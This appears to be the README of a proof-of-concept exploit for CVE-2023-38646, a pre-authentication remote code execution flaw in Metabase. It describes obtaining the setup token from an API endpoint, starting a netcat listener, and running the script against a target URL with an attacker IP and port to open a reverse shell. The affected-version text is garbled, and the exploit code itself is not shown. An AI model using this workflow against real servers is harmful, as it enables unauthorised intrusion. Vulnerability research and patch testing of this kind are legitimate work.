# Metabase Pre-Auth RCE POC - CVE-2023-38646
Metabase open source before and Metabase Enterprise before allow attackers to execute arbitrary commands on the server. I have written the script directly to gain reverse shell on the attacker's machine.

## Usage
The script require the Target URL, Attackers IP and Port. Providing the setup token is not required for this exploit as the script tries to obtain it from `/api/session/properties`.

Make sure to start netcat listener on Attacker machine, using the following command : 
`nc -nlvp {Port}`

Run the POC Script with:
- -u  - Target URL (Metabase)
- -ip  - Attacker IP
- -p  - Port Number  
python3 -u <target-url> -ip <IP> -p <PORT>

## References